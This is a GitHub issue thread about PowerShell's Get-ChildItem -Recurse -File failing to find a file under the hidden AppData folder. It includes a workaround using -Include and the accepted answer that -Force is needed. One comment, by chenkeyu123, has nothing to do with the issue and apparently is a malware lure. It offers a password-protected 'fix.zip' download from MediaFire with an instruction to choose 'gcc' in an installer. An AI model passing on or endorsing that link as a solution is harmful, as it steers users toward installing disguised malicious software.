### ISSUE TITLE
Get-ChildItem -Recurse -File fails

### ISSUE THREAD

**Issue by C1Ron** [PowerShell/PowerShell#24220]
### Prerequisites

- [X] Write a descriptive title.
- [X] Make sure you are able to repro it on the [latest released version](https://github.com/PowerShell/PowerShell/releases)
- [X] Search the existing issues.
- [X] Refer to the [FAQ](https://github.com/PowerShell/PowerShell/blob/master/docs/FAQ.md).
- [X] Refer to [Differences between Windows PowerShell 5.1 and PowerShell](https://learn.microsoft.com/powershell/scripting/whats-new/differences-from-windows-powershell).

### Steps to reproduce

I know there is a `Notable.exe` file located in a subdirectory, under C:\Users\ronny\AppData\Local\Programs\notable
```
PS> Get-ChildItem -Path AppData\Local\Programs\notable -Filter Notable.exe

    Directory: C:\Users\ronny\AppData\Local\Programs\notable

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a---          21/01/2020    21:02      104728576 Notable.exe
```
But the `Get-ChildItem -Recurse` fails when I don't supply a path
```
PS> Get-ChildItem -Path . -Recurse -File -Filter Notable.exe
```
Note that I don't need to specify the full path to get a positive match. It's enough to provide `-Path AppData`.
### Expected behavior

```console
PS> Get-ChildItem -Path . -Recurse -File -Filter Notable*
Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a---          21/01/2020    21:02      104728576 Notable.exe
```

### Actual behavior

```console
PS> Get-ChildItem -Path . -Recurse -File -Filter Notable*
```

### Environment data

```powershell
Name                           Value
----                           -----
PSVersion                      7.4.5
PSEdition                      Core
GitCommitId                    7.4.5
OS                             Microsoft Windows 10.0.22631
Platform                       Win32NT
PSCompatibleVersions           {1.0, 2.0, 3.0, 4.0…}
PSRemotingProtocolVersion      2.3
SerializationVersion           1.1.0.1
WSManStackVersion              3.0
```

**Comment by jhoneill** [comment]
There are some long standing quirks with Get-ChildItem and recurse. 
For this case use `-include` instead of `-filter`  although Include _doesn't_ work in some other cases 
```
get-childitem  -Include "*.ps1xml"
get-childitem . -Include "*.ps1xml"
get-childitem *.* -Include "*.ps1xml"
get-childitem -Include "*.ps1xml" -Recurse -Depth 0
```
You might expect to all get ps1xml files in the current directory, but only the last two do - and the final one is fairly perverse. 
 `get-childitem -Include "*.ps1xml" -Recurse`   will look in all subdirectories.

**Comment by chenkeyu123** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by rhubarb-geek-nz** [comment]
I suggest the problem is because AppData is normally hidden so excluded from searches. Force is required in the example below.

```
PS> Get-Item AppData -Force

    Directory: C:\Users\foo

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d--h-          30/10/2022    21:53                AppData
```

**Comment by C1Ron** [comment]
The `-Include` flag makes `Get-ChildItem` very slow, so That's not the preferred solution.
The `-Force` flag does indeed work :)

**Comment by C1Ron** [comment]
Solution by @rhubarb-geek-nz : AppData is normally hidden. Force is required
